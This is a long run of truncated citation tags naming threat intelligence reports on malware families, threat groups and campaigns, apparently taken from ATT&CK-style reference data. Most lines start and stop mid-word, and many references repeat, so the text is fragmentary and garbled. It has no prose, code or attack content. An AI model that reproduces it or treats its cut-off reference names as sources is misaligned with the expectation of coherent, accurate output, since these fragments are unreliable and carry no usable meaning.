December 2021),(Citation: Arxiv Avaddon Feb 2021),(Citation: Microsoft BlackCat Jun 2022),(Citation: CrowdStrike Wizard Spider October 2

),(Citation: Bitdefender Naikon April 2021),(Citation: FireEye admin@338),(Citation: Trend Micro DRBControl February 2020),(Citation: Fire
ocke March 2019),(Citation: Talos PoetRAT April 2020),(Citation: Kaspersky WIRTE November 2021),(Citation: Elastic Pikabot 2024),(Citatio

(Citation: Microsoft NICKEL December 2021),(Citation: group-ib_redcurl2),(Citation: Dell TG-3390),(Citation: US-CERT NotPetya 2017),(Cita

ET Industroyer),(Citation: Mandiant APT41),(Citation: Cybereason Soft Cell June 2019),(Citation: Unit 42 CARROTBAT January 2020),(Citatio

MuddyWater June 2019),(Citation: CISA ComRAT Oct 2020),(Citation: ESET LoudMiner June 2019),(Citation: Bitdefender FIN8 July 2021),(Ci

us macOS April 2019),(Citation: Novetta Winnti April 2015),(Citation: NCC Group WastedLocker June 2020),(Citation: CheckPoint SpeakUp F

onal Mar 2020),(Citation: BlackBerry CostaRicto November 2020),(Citation: Unit 42 Lucifer June 2020),(Citation: Malwarebytes Kimsuky Jun

es),(Citation: Lab52 WIRTE Apr 2019),(Citation: Symantec Tick Apr 2016),(Citation: IBM ITG07 June 2019),(Citation: BlackBerry CostaRicto N

point Operation Transparent Tribe March 2016),(Citation: Kaspersky WIRTE November 2021),(Citation: Sophos Ragnar May 2020),(Citation
rks DarkTortilla Aug 2022),(Citation: DomainTools WinterVivern 2021),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Cybere
ber 2020),(Citation: SentinelOne Valak June 2020),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: KISA Op

n: ESET Security Mispadu Facebook Ads 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: ClearSky L
erserk Bear October 2021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Cita

: Cobalt Strike Manual 4.3 November 2020),(Citation: CarbonBlack Conti July 2020),(Citation: FireEye Poison Ivy),(Citation: ESET BackdoorD

(Citation: Symantec W32.Duqu),(Citation: Forcepoint Monsoon),(Citation: Unit42 Azorult Nov 2018),(Citation: Cymmetria Patchwork),(Cita

tation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: MalwareBytes LazySc

ay 2019),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Talos Cob
tion: SentinelOne Agrius 2021),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Novetta-Axiom),(Citation: M
ti July 2020),(Citation: Trend Micro Ransomware Spotlight Play July 2023),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Cit

er 2020),(Citation: CrowdStrike BloodHound April 2018),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Talos Coba

Group Chimera January 2021),(Citation: Trend Micro Qakbot May 2020),(Citation: Cybereason Soft Cell June 2019),(Citation: ESET Machete

iro 2021),(Citation: ESET Casbaneiro Oct 2019),(Citation: Cylance Cleaver),(Citation: FireEye FIN7 April 2017),(Citation: Unit42 RDAT July 20
Albanian Government Attacks September 2022),(Citation: FireEye Exchange Zero Days March 2021),(Citation: Mandiant Pulse Secure Upd

B Ransomware September 2020),(Citation: BlackBerry Bahamut),(Citation: ESET InvisiMole June 2020),(Citation: Malwarebytes Dyreza No
dmap),(Citation: Prevailion DarkWatchman 2021),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Kaspersky Flame Functio

ovember 2020),(Citation: ClearSky OilRig Jan 2017),(Citation: Talos Cobalt Strike September 2020),(Citation: FireEye Operation Molerats),(
pplication Control),(Citation: Corio 2008),(Citation: TechNet Applocker vs SRP)
T BLINDINGCAN Aug 2020),(Citation: FireEye Clandestine Fox),(Citation: Symantec Daggerfly 2023),(Citation: Crowdstrike DNC June 2016),(

bs reversing run-only applescripts 2021),(Citation: Check Point Meteor Aug 2021),(Citation: Proofpoint TA505 Jan 2019),(Citation: Fortinet

1),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: CISA SoreFang July 2016),(Citation: Cylance Dust Storm),(Citation: FireEye

),(Citation: ESET Zebrocy May 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: McAfee Cuba April 2021),(Citation: Talos Coba
door December 2020),(Citation: Cylance Shaheen Nov 2018),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Securelist WhiteBear Aug 2017

: Palo Alto OilRig May 2016),(Citation: Palo Alto Comnie),(Citation: TrendMicro Ursnif Mar 2015),(Citation: Cylance Dust Storm),(Citation: L

crosoft SIR Vol 21),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: GitHub Pupy),(Citation: NCC Group WastedLocker June

),(Citation: Trend Micro DRBControl February 2020),(Citation: Mandiant APT1),(Citation: Zscaler Higaisa 2020),(Citation: NCC Group Team9
mber 2021),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Cybereason Oceanl

somware Targeting Healthcare October 2020),(Citation: FireEye Fin8 May 2016),(Citation: KISA Operation Muzabi),(Citation: Securelist Mac
urt of NY APT10 Indictment December 2018),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: FoxIT Wocao December 2019),(Citation:

tion: ESET InvisiMole June 2020),(Citation: ESET InvisiMole June 2018),(Citation: AsyncRAT GitHub),

2024),(Citation: Talos Remcos Aug 2018),(Citation: Unit 42 DarkHydrus July 2018),(Citation: NCC Group WastedLocker June 2020),(Citation
project 2020),

ation: Anomali Rocke March 2019),(Citation: Talos Rocke August 2018),(Citation: Proofpoint TA416 Europe March 2022),(Citation: group-i
ation: Checkpoint IndigoZebra July 2021),(Citation: Microsoft POLONIUM June 2022),(Citation: FireEye admin@338),(Citation: Palo Alto Co

(Citation: Group IB Ransomware May 2020),(Citation: ESET Lazarus Jun 2020),(Citation: FireEye FIN7 April 2017),(Citation: Talos Olympic D
020),(Citation: Crowdstrike Indrik November 2018),(Citation: Cymmetria Patchwork),(Citation: Secure List Bad Rabbit),(Citation: Github Koa

on Group),(Citation: SecureWorks August 2019),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: MSTIC Octo Tempest Operations

p-ib_redcurl2),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Elastic Pikabot 2024),(Citation: Malwarebytes Pony April 2016),(C

T October 2020),(Citation: DomainTools WinterVivern 2021),(Citation: Proofpoint TA407 September 2019),(Citation: US District Court Indi
Feb 2021),(Citation: SecureWorks August 2019),(Citation: Talos Cobalt Strike September 2020),(Citation: ThreatStream Evasion Analysis),(C

9),(Citation: ESET Dukes October 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: McAfee Night Dragon),(Citation: Symantec Vasp

: CheckPoint Naikon May 2020),(Citation: CISA AA21-200A APT40 July 2021),(Citation: trendmicro xcsset xcode project 2020),(Citation: Bit

January 2024),(Citation: objective-see windtail2 jan 2019),(Citation: Rclone),(Citation: Mandiant APT1),(Citation: Securelist Calisto July 201

Palo Alto T9000 Feb 2016),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: Microsoft NICKEL December 2021),(Citation: T

),(Citation: McAfee Netwire Mar 2015),(Citation: Korean FSI TA505 2020),(Citation: Talos Konni May 2017),(Citation: Novetta Winnti April
,(Citation: win10_asr),(Citation: Microsoft PS JEA),(Citation: Microsoft PowerShell CLM)

Symantec Leafminer July 2018),(Citation: SocGholish-update),(Citation: Mandiant Cutting Edge January 2024),(Citation: PTSecurity Higaisa

May 2017),(Citation: BiZone Lizar May 2021),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: PowerSploit Documentation),(C
ar 2017),(Citation: CheckPoint Bandook Nov 2020),(Citation: GitHub SILENTTRINITY Modules July 2019),
ation: Proofpoint NETWIRE December 2020),(Citation: Objective-See MacMa Nov 2021),(Citation: trendmicro xcsset xcode project 2020),(
Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: S
ut Dark Caracal Jan 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: FireEye APT17),(Citation: Microsoft GALLIUM December
rashoverride 2017),(Citation: Unit 42 Kazuar May 2017),(Citation: Talos Bisonal Mar 2020),(Citation: Novetta Blockbuster),(Citation: Secure

Covid-19 October 2020),(Citation: Cyberreason Anchor December 2019),(Citation: Unit42 Azorult Nov 2018),(Citation: group-ib_redcurl2)

20),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Group IB GrimAgent July 2021),(Citation: Securelist Machete Aug 2014),(
Citation: Crowdstrike Indrik November 2018),(Citation: FireEye WannaCry 2017),(Citation: Sophos Ragnar May 2020),(Citation: Mandiant R

andiant ROADSWEEP August 2022),(Citation: CISA AA21-200A APT40 July 2021),(Citation: ESET InvisiMole June 2018),(Citation: Bitdefende

or December 2020),(Citation: NCCGroup RokRat Nov 2018),(Citation: McAfee Honeybee),(Citation: RiskIQ British Airways September 2018)
Exploitation January 2024),(Citation: OilRig New Delivery Oct 2017),(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation: TrendMicro

n: Telefonica Snip3 December 2021),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: ESET OceanLotus),(Citation: Secureworks RE

: Dingledine Tor The Second-Generation Onion Router),(Citation: ESET Kobalos Jan 2021),(Citation: NCSC Cyclops Blink February 2022),(Cit
Frankenstein June 2019),(Citation: ESET Casbaneiro Oct 2019),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: RotaJakiro
ESET Gelsemium June 2021),(Citation: Github PowerShell Empire),(Citation: Leonardo Turla Penquin May 2020),(Citation: SentinelOne Vala

eWorks BRONZE STARLIGHT Ransomware Operations June 2022),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: R
n: FireEye APT37 Feb 2018),(Citation: Talos Group123),(Citation: Microsoft Holmium June 2020),(Citation: ESET OceanLotus Mar 2019),(Cita

9),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: Secureworks GOLD SAHARA),(Citation: NCC Group APT15 Alive and S
irmingham C2)
r 2022),(Citation: ESET Dukes October 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: McAfee Night Dragon),(C
alos PoetRAT April 2020),(Citation: Proofpoint TA416 Europe March 2022),(Citation: group-ib_redcurl2),(Citation: TrendMicro Tropic Troop

18),(Citation: Microsoft SIR Vol 21),(Citation: Proofpoint TA416 November 2020),(Citation: Stewart 2014),(Citation: SentinelLabs Metador
Labs reversing run-only applescripts 2021),(Citation: Unit42 Agrius 2023),(Citation: Talos Rocke August 2018),(Citation: wardle evilquest pa

Secret),(Citation: ESET OceanLotus macOS April 2019),(Citation: Kaspersky Turla Aug 2014),(Citation: Korean FSI TA505 2020),(Citation: Tal

owerShell May 2019),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien

eBytes LazyScripter Feb 2021),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: Symantec Remsec IOCs),(Citation: Forcepoint BITTE
022),(Citation: Talos Sodinokibi April 2019),(Citation: Avertium Black Basta June 2022),(Citation: NCC Group Black Basta June 2022),(Citatio

9),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: Github PowerShell Empire),(Citation: F-Secure The Dukes),(Citation: Securelist Lucky
t42 Agrius 2023),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: SentinelOne WinterVivern 2023),(Citation: Unit 42 TA55

,(Citation: Morphisec FIN7 June 2017),(Citation: ESET Attor Oct 2019),(Citation: Symantec Backdoor.Nidiran),(Citation: Unit 42 PingPull Jun
Mandiant APT41),(Citation: ESET Nomadic Octopus 2018),(Citation: ESET Machete July 2019),(Citation: Kimsuky Malwarebytes),(Citation:

ent Tesla Aug 2020),(Citation: BlackBerry Amadey 2020),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Red Canar

aspersky WIRTE November 2021),(Citation: Kaspersky Lab SynAck May 2018),(Citation: McAfee Honeybee),(Citation: XAgentOSX 2017),(Ci

018),(Citation: SentinelOne INC Ransomware),(Citation: Eset Ramsay May 2020),(Citation: FoxIT Wocao December 2019),(Citation: Cybere
Strike Wizard Spider October 2020),(Citation: Fortinet Diavol July 2021),(Citation: Mandiant FIN13 Aug 2022),(Citation: TrendMicro Tonto

February 2020),(Citation: FireEye Metamorfo Apr 2018),(Citation: Palo Alto MoonWind March 2017),(Citation: Chronicle Winnti for Linux
: Elastic Pikabot 2024),(Citation: Trend Micro njRAT 2018),(Citation: Costa AvosLocker May 2022),

US-CERT NotPetya 2017),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Symantec WastedLocker June 2020),(Citation: Git

ROTBAT January 2020),(Citation: ESET ComRAT May 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Microsoft Deep Dive Soloriga

itdefender FIN8 July 2021),(Citation: objsee mac malware 2017),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Cycraft Chimera April 2

itation: CheckPoint SpeakUp Feb 2019),(Citation: Cybereason Oceanlotus May 2017),(Citation: Unit42 BendyBear Feb 2021),(Citation: Talo

on: Malwarebytes Kimsuky June 2021),(Citation: McAfee Cuba April 2021),(Citation: Cyberreason Anchor December 2019),(Citation: Lungh

tation: BlackBerry CostaRicto November 2020),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Cisco Talos Avos Jun 2022),(Cita

hos Ragnar May 2020),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: ESET Gamared
August 2021),(Citation: Cybereason Oceanlotus May 2017),(Citation: Secureworks IRON TILDEN Profile),(Citation: Securelist MuddyWater O
ctober 2020),(Citation: KISA Operation Muzabi),(Citation: Telefonica Snip3 December 2021),(Citation: Zscaler APT31 Covid-19 October 202

July 2022),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: FireEye APT17),(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MA
ULMEDIA October 2020),(Citation: BitDefender BADHATCH Mar 2021),(Citation: Trend Micro DRBControl February 2020),(Citation: F-Secu

Ivy),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: BiZone Lizar May 2021),(Citation: FinFisher Citation),(Citation: Talos Cobalt Str

n: Cymmetria Patchwork),(Citation: Cybereason Astaroth Feb 2019),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: CheckPoint Band

Citation: MalwareBytes LazyScripter Feb 2021),(Citation: JPCert PLEAD Downloader June 2018),(Citation: JPCert BlackTech Malware Septe

ober 2020),(Citation: Talos Cobalt Strike September 2020),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: McAfee Sharpshooter
n: Novetta-Axiom),(Citation: Microsoft Albanian Government Attacks September 2022),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Cyc
ed Actor September 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: Medium Anchor DNS July 2020),(Citation: Novetta-Axiom

ber 2020),(Citation: Talos Cobalt Strike September 2020),(Citation: Cyberreason Anchor December 2019),(Citation: Red Canary Hospital Th

2019),(Citation: ESET Machete July 2019),(Citation: ESET ComRAT May 2020),(Citation: Talos Nyetya June 2017),(Citation: Cybereason Cob

(Citation: Unit42 RDAT July 2020),(Citation: ESET Zebrocy Nov 2018),(Citation: BleepingComputer Molerats Dec 2020),(Citation: Anomali S
n: Mandiant Pulse Secure Update May 2021),(Citation: DFIR Phosphorus November 2021),(Citation: ClearSky Lebanese Cedar Jan 2021),(C

tion: Malwarebytes Dyreza November 2015),(Citation: ESET InvisiMole June 2018),(Citation: trendmicro xcsset xcode project 2020),
ation: Kaspersky Flame Functionality),(Citation: KISA Operation Muzabi),(Citation: HP RaspberryRobin 2024),(Citation: MalwareBytes Wood

FireEye Operation Molerats),(Citation: Cyberreason Anchor December 2019),(Citation: FireEye FIN7 Oct 2019),(Citation: JPCERT ChChes Fe
Crowdstrike DNC June 2016),(Citation: ESET Hermetic Wizard March 2022),(Citation: ESET Zebrocy May 2019),(Citation: Cobalt Strike Man

5 Jan 2019),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Qualys Hermetic Wiper March 2022),(Citation: ESET Kobalos Jan 2021),(Cita

e Dust Storm),(Citation: FireEye APT41 Aug 2019),(Citation: Trend Micro TeamTNT),(Citation: ESET Turla PowerShell May 2019),(Citation: N

pril 2021),(Citation: Talos Cobalt Strike September 2020),(Citation: Symantec W32.Duqu),(Citation: FireEye APT34 Dec 2017),(Citation: Che
Securelist WhiteBear Aug 2017),(Citation: XAgentOSX 2017),(Citation: Unit42 Cannon Nov 2018),(Citation: ESET Turla Lunar toolset May 20

ylance Dust Storm),(Citation: Lunghi Iron Tiger Linux),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Kaspersky Adwind Feb 2016),

NCC Group WastedLocker June 2020),(Citation: Novetta Winnti April 2015),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Cyberreason

0),(Citation: NCC Group Team9 June 2020),(Citation: Palo Alto MoonWind March 2017),(Citation: Unit 42 Shamoon3 2018),(Citation: Kaspe
,(Citation: Cybereason Oceanlotus May 2017),(Citation: Secureworks IRON TILDEN Profile),(Citation: Securelist MuddyWater Oct 2018),(Cit

uzabi),(Citation: Securelist Machete Aug 2014),(Citation: Telefonica Snip3 December 2021),(Citation: unit42_gamaredon_dec2022),(Citatio
cao December 2019),(Citation: DOJ Iran Indictments March 2018),(Citation: Bizeul 2014),(Citation: Securelist APT10 March 2021),(Citation:

tedLocker June 2020),(Citation: Microsoft FinFisher March 2018),(Citation: Palo Alto Networks Black Basta August 2022),(Citation: IBM Me

March 2022),(Citation: group-ib_redcurl2),(Citation: Check Point APT35 CharmPower January 2022),(Citation: ESET Gamaredon June 2020)
n@338),(Citation: Palo Alto Comnie),

17),(Citation: Talos Olympic Destroyer 2018),(Citation: Cybereason Bumblebee August 2022),(Citation: BleepingComputer Molerats Dec 2
d Rabbit),(Citation: Github Koadic),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Mandiant ROAD

TIC Octo Tempest Operations October 2023),(Citation: Cyberreason Anchor December 2019),(Citation: DFIR Ryuk's Return October 2020),(

warebytes Pony April 2016),(Citation: Trend Micro Trickbot Nov 2018),(Citation: group-ib_redcurl1),(Citation: ESET InvisiMole June 2018),

Citation: US District Court Indictment GRU Oct 2018),(Citation: Cybereason Kimsuky November 2020),(Citation: Certfa Charming Kitten Jan
eatStream Evasion Analysis),(Citation: Cyberreason Anchor December 2019),(Citation: Palo Alto OilRig Sep 2018),(Citation: Medium Ancho

gon),(Citation: Symantec Vasport May 2012),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: Unit 42 MechaFlound

de project 2020),(Citation: Bitdefender LuminousMoth July 2021),(Citation: Google TAG COLDRIVER January 2024),(Citation: Kaspersky Tu

tion: Securelist Calisto July 2018),(Citation: Avira Mustang Panda January 2020),(Citation: PWC Cloud Hopper Technical Annex April 2017),

L December 2021),(Citation: Trend Micro FIN6 October 2019),(Citation: Talos PoetRAT April 2020),(Citation: group-ib_redcurl2),(Citation: T

Citation: Novetta Winnti April 2015),(Citation: PowerSploit Documentation),(Citation: Cybereason Oceanlotus May 2017),(Citation: Cybere
4),(Citation: PTSecurity Higaisa 2020),(Citation: CISA AA20-301A Kimsuky),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Kaspersky

owerSploit Documentation),(Citation: Cybereason Oceanlotus May 2017),(Citation: Securelist MuddyWater Oct 2018),(Citation: Symantec

o xcsset xcode project 2020),(Citation: Crowdstrike HuntReport 2022),

gate January 2021),(Citation: Symantec Emotet Jul 2018),(Citation: IBM TA505 April 2020),(Citation: Cyberint Qakbot May 2021),(Citation:
Microsoft GALLIUM December 2019),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MA
Blockbuster),(Citation: Secureworks Emotet Nov 2018),(Citation: Nccgroup Emissary Panda May 2018),(Citation: McAfee Cuba April 2021)

),(Citation: group-ib_redcurl2),(Citation: Proofpoint NETWIRE December 2020),(Citation: Trend Micro Trickbot Nov 2018),(Citation: Bitdefe

ecurelist Machete Aug 2014),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Cyberreason Anchor December 2019),(Citation: JPCERT Ch
ay 2020),(Citation: Mandiant ROADSWEEP August 2022),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: FireEye Maze May 202

ne 2018),(Citation: Bitdefender Naikon April 2021),(Citation: Symantec WastedLocker June 2020),(Citation: Securelist Calisto July 2018),(Ci

tish Airways September 2018),(Citation: Mandiant APT41),(Citation: ESET Nomadic Octopus 2018),(Citation: Cybereason Soft Cell June 201
preader),(Citation: TrendMicro EarthLusca 2022),(Citation: ESET Security Mispadu Facebook Ads 2019),(Citation: FireEye FIN7 Oct 2019),(C

otus),(Citation: Secureworks REvil September 2019),(Citation: Cylance Dust Storm),(Citation: PWC Yellow Liderc 2023),(Citation: CSM Elder

clops Blink February 2022),(Citation: Juniper IcedID June 2020),(Citation: US-CERT Volgmer Nov 2017),(Citation: FireEye POSHSPY April 201
ber 2018),(Citation: RotaJakiro 2021 netlab360 analysis),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: Unit42 RDAT July 2020),(Citatio
20),(Citation: SentinelOne Valak June 2020),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: US-CERT BLINDINGCA

tion January 2024),(Citation: RedCanary Mockingbird May 2020),(Citation: SentinelOne INC Ransomware),(Citation: FoxIT Wocao Decembe
ET OceanLotus Mar 2019),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Symantec Elderwood Sept 2012),(Citation: MSTIC NOBELIUM M

: NCC Group APT15 Alive and Strong),(Citation: Mandiant APT29 Microsoft 365 2022),(Citation: FireEye APT34 Webinar Dec 2017),(Citation

tion: McAfee Night Dragon),(Citation: Unit42 BabyShark Feb 2019),(Citation: ESET Attor Oct 2019),(Citation: FoxIT Wocao December 2019)
tion: TrendMicro Tropic Trooper May 2020),(Citation: wardle evilquest parti),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: E

tation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: Proofpoint ZeroT Feb 2017),(Citation: CheckPoint Naikon May 2020
),(Citation: wardle evilquest parti),(Citation: SANS Conficker),(Citation: Check Point Meteor Aug 2021),(Citation: Sophos Ragnar May 2020)

FSI TA505 2020),(Citation: Talos Konni May 2017),(Citation: Novetta Winnti April 2015),(Citation: CheckPoint SpeakUp Feb 2019),(Citation

ere, Liam O Murchu, Eric Chien February 2011),(Citation: Anomali Rocke March 2019),(Citation: Crowdstrike Indrik November 2018),(Citati

Cs),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Check Point Meteor Aug 20
Black Basta June 2022),(Citation: Carbon Black JCry May 2019),(Citation: Secureworks REvil September 2019),(Citation: Unit42 Agrius 2023

kes),(Citation: Securelist LuckyMouse June 2018),(Citation: Fidelis njRAT June 2013),(Citation: Symantec Buckeye),(Citation: Prevailion Dark
n 2023),(Citation: Unit 42 TA551 Jan 2021),(Citation: BlackBerry Bahamut),(Citation: Twitter ItsReallyNick Platinum Masquerade),(Citation:

,(Citation: Unit 42 PingPull Jun 2022),(Citation: Cyble Black Basta May 2022),(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation: ES
suky Malwarebytes),(Citation: Lotus Blossom Jun 2015),(Citation: Cybereason Cobalt Kitty 2017),(Citation: ESET Casbaneiro Oct 2019),(Cita

ber 2019),(Citation: Red Canary Qbot),(Citation: US-CERT Bankshot Dec 2017),(Citation: Mandiant FIN12 Oct 2021),(Citation: CERT-FR PYSA

Citation: XAgentOSX 2017),(Citation: Mandiant APT41),(Citation: ESET ComRAT May 2020),(Citation: Cisco CaddyWiper March 2022),(Citati

ember 2019),(Citation: Cybereason Royal December 2022),(Citation: Cisco Talos Intelligence Group),(Citation: ClearSky Pay2Kitten Decemb
),(Citation: TrendMicro Tonto Team October 2020),(Citation: CarbonBlack Conti July 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: K

on: Chronicle Winnti for Linux May 2019),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Proofpoint LookBack Malware Aug 2019),(Cit

ocker June 2020),(Citation: GitHub PowerSploit May 2012),(Citation: Mandiant APT1),(Citation: Trend Micro Muddy Water March 2021),(C

n: Microsoft Deep Dive Solorigate January 2021),(Citation: Proofpoint TA505 October 2019),(Citation: Cybereason Bumblebee August 2022

tation: Cycraft Chimera April 2020),(Citation: ESET Emotet Dec 2018),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Trend M

yBear Feb 2021),(Citation: Talos Zeus Panda Nov 2017),(Citation: TrendMicro macOS Dacls May 2020),(Citation: Cylance Dust Storm),(Citati

cember 2019),(Citation: Lunghi Iron Tiger Linux),(Citation: hexed osx.dok analysis 2019),(Citation: Talos Rocke August 2018),(Citation: Forti

sco Talos Avos Jun 2022),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: unit42_gamaredon_dec2022),(Citation: Unit 42 DarkHyd

017),(Citation: ESET Gamaredon June 2020),(Citation: Mandiant ROADSWEEP August 2022),(Citation: Trend Micro njRAT 2018),(Citation: U
tion: Securelist MuddyWater Oct 2018),(Citation: Cybereason Chaes Nov 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Unit 42 Va
r APT31 Covid-19 October 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Cyberreason Anchor December 2019),(Citation:

834-2.v1 TAINTEDSCRIBE MAY 2020),(Citation: Trend Micro njRAT 2018),(Citation: MoustachedBouncer ESET August 2023),(Citation: Kasp
bruary 2020),(Citation: F-Secure Sofacy 2015),(Citation: Talos Group123),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Man

tion),(Citation: Talos Cobalt Strike September 2020),(Citation: GitHub Pupy),(Citation: PowerSploit Documentation),(Citation: Unit 42 IronN

8),(Citation: CheckPoint Bandook Nov 2020),(Citation: RecordedFuture WhisperGate Jan 2022),

Cert BlackTech Malware September 2019),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: CISA AA24-038A PRC Critical Infrastructure Fe

tation: McAfee Sharpshooter December 2018),(Citation: TrendMicro Ursnif Mar 2015),(Citation: Unit42 Azorult Nov 2018),(Citation: FireE
Bazar Nov 2021),(Citation: Cycraft Chimera April 2020),(Citation: FireEye PLA),(Citation: Mandiant Pulse Secure Update May 2021),(Citation
2020),(Citation: Novetta-Axiom),(Citation: Microsoft Albanian Government Attacks September 2022),(Citation: Symantec W32.Duqu),(Citati

ation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: TechNet Ping),(Citation: FireEye Shamoon Nov 2016),(Citation: Unit42

17),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: Microsoft Totbrick Oct 2017),(Citation: CISA

Dec 2020),(Citation: Anomali Static Kitten February 2021),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: Microsoft Actinium February
y Lebanese Cedar Jan 2021),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: FireEye APT39 Jan 2019),(Citation: Microsoft

et xcode project 2020),

(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Symantec Bumblebee June 2022),(Citatio

9),(Citation: JPCERT ChChes Feb 2017),(Citation: Cybereason Kimsuky November 2020),(Citation: Cybereason TA505 April 2019),(Citation:
9),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Trendmicro_IcedID),(Citation: MalwareBytes LazyScripter Feb 2021),(Cita

: ESET Kobalos Jan 2021),(Citation: FireEye Metamorfo Apr 2018),(Citation: Mandiant APT1),(Citation: Red Canary SocGholish March 2024

erShell May 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: DFIR Report APT35 ProxyShell March 20

PT34 Dec 2017),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Antiy CERT Ramsay April 2020),(Citation: FireEye admin
ET Turla Lunar toolset May 2024),(Citation: Mandiant APT41),(Citation: NCC Group Chimera January 2021),(Citation: Cybereason Soft Cell

Kaspersky Adwind Feb 2016),(Citation: Crowdstrike Indrik November 2018),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Kasper

r 2019),(Citation: Cyberreason Anchor December 2019),(Citation: DFIR Ryuk's Return October 2020),(Citation: FireEye APT41 March 2020),

amoon3 2018),(Citation: Kaspersky TajMahal April 2019),(Citation: S2W Racoon 2022),(Citation: Ensilo Darkgate 2018),(Citation: ESET Evas
st MuddyWater Oct 2018),(Citation: Cybereason Chaes Nov 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Anomali Pirate Panda A

gamaredon_dec2022),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: US Distri
APT10 March 2021),(Citation: US-CERT TA18-074A),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Novett

ugust 2022),(Citation: IBM MegaCortex),(Citation: Cybereason Kimsuky November 2020),(Citation: SentinelLabs reversing run-only applesc

: ESET Gamaredon June 2020),(Citation: Mandiant ROADSWEEP August 2022),(Citation: group-ib_redcurl1),

pingComputer Molerats Dec 2020),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Secureworks GOLD IONIC April 2024)
